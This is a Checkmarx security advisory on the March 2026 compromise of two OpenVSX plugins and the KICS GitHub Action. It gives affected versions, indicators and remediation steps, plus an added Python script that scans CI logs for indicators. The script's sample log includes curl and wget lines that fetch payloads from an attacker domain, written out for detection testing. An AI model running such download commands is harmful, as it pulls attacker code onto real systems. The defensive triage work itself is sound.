Checkmarx Security Update
We are writing to inform you that Checkmarx has identified a recent supply chain security incident involving the KICS open-source project, and two specific Checkmarx plugins distributed via the OpenVSX marketplace.
While we are not aware of any impact to customer data or production environments, we continue to actively investigate and will share details as they emerge.
What Happened
On March 23, 2026, at approximately 02:53 UTC, malicious versions of two plugins were published to the OpenVSX registry.
Only organizations that downloaded the following artifacts from OpenVSX today (3/23/2026) between 02:53 UTC and 15:41 UTC and ran them are potentially impacted by this incident.
- ast-results-2.53.0.vsix
- cx-dev-assist-1.7.0.vsix
Plugins downloaded from the VS Code Marketplace were not affected.
Current Status
- We have identified and released new versions of the impacted plugins.
- Please ensure that you are using these updated versions:
  - For checkmarx.cx-dev-assist, use version 1.10.0 or later.
  - For checkmarx.ast-results, use version 2.56.0 or later.
- We are actively working with OpenVSX to remove any remaining malicious artifacts.
Recommended Actions
If you downloaded the malicious versions of either plugin (ast-results-2.53.0.vsix or cx-dev-assist-1.7.0.vsix) from OpenVSX during the affected period, we strongly recommend following these precautionary steps:
- Rotate all secrets and credentials accessible to CI runners during the affected period, including GitHub Personal Access Tokens (PATs), cloud service credentials, and repository or organization-level secrets.
- Review GitHub Actions runs, search for suspicious indicators such as references to tpcp.tar.gz, aquasecurity, or checkmarx.zone, and check for unexpected repositories like tpcp-docs. If you find any of these, remove them or contact Checkmarx Support for guidance.
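The two checks above can be scripted. The following is an added example, not Checkmarx's code: it scans CI log text for the indicators named in this advisory and flags installed Checkmarx extensions below the versions recommended above. The log excerpt and extension listing are constructed sample data; the listing uses the `publisher.name@version` format printed by `code --list-extensions --show-versions`.

```python
"""Triage helpers for the Checkmarx OpenVSX plugin incident (added example, not
Checkmarx's code): scan CI logs for advisory indicators, check extension versions."""
import re

# Indicators named in the advisory, matched case-insensitively as substrings.
INDICATORS = ("tpcp.tar.gz", "aquasecurity", "checkmarx.zone", "tpcp-docs")

# Minimum versions the advisory asks customers to run (publisher.name -> version).
MIN_SAFE = {"checkmarx.cx-dev-assist": (1, 10, 0),
            "checkmarx.ast-results": (2, 56, 0)}

# Constructed sample data: a GitHub Actions run log excerpt and an extension
# listing in the format of `code --list-extensions --show-versions`.
SAMPLE_LOG = """\
2026-03-23T10:12:01Z Run actions/checkout@v4
2026-03-23T10:12:09Z curl -sL https://checkmarx.zone/tpcp.tar.gz -o tpcp.tar.gz
2026-03-23T10:12:40Z git clone https://github.com/example-org/tpcp-docs
2026-03-23T10:13:02Z wget https://example.invalid/aquasecurity/setup.sh
"""
SAMPLE_EXTENSIONS = """\
checkmarx.ast-results@2.53.0
checkmarx.cx-dev-assist@1.10.0
ms-python.python@2026.2.0
"""

def find_indicators(lines):
    """Return (line_no, indicator, line) for every indicator hit, in log order."""
    hits = []
    for no, line in enumerate(lines, start=1):
        low = line.lower()
        hits.extend((no, ind, line) for ind in INDICATORS if ind in low)
    return hits

def parse_version(text):
    """'2.53.0' -> (2, 53, 0); non-numeric suffixes are ignored."""
    return tuple(int(p) for p in re.findall(r"\d+", text))

def outdated_extensions(listing):
    """Map each Checkmarx extension below its advisory minimum to its version."""
    outdated = {}
    for entry in listing.splitlines():
        ident, _, version = entry.strip().partition("@")
        minimum = MIN_SAFE.get(ident.lower())
        if minimum and parse_version(version) < minimum:
            outdated[ident.lower()] = version
    return outdated

if __name__ == "__main__":  # stand-alone run over the constructed samples
    print(*find_indicators(SAMPLE_LOG.splitlines()), sep="\n")
    print(outdated_extensions(SAMPLE_EXTENSIONS))
```

Feed real run logs (for example, exported with `gh run view --log`) and the real `code --list-extensions --show-versions` output into the two functions in place of the samples.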
KICS Open-Source Update
An issue was also identified in the KICS GitHub Action on March 23, 2026. It was limited to the GitHub Action distribution between 12:58 and 16:50 UTC, and the maintainers acted immediately, revoking the affected tags, securing access, and preventing unauthorized changes. The issue was fully resolved by 19:24 UTC. Checkmarx KICS itself remains secure and unaffected.
Additional Guidance
We recommend that you continue adhering to your organization’s standard incident response procedures, including increased monitoring and validation of development and build environments.
Do not download the affected versions of the two plugins listed above (ast-results-2.53.0.vsix or cx-dev-assist-1.7.0.vsix).
We’re Here to Help
Our team is actively monitoring the situation and is available to support you. If you have any questions, please contact Checkmarx Support.
We take our customers’ security very seriously and are taking steps to reinforce our processes. We will continue to provide updates as more information becomes available.
Article Link: Checkmarx Security Update
Malware Analysis, News and Indicators - Latest topics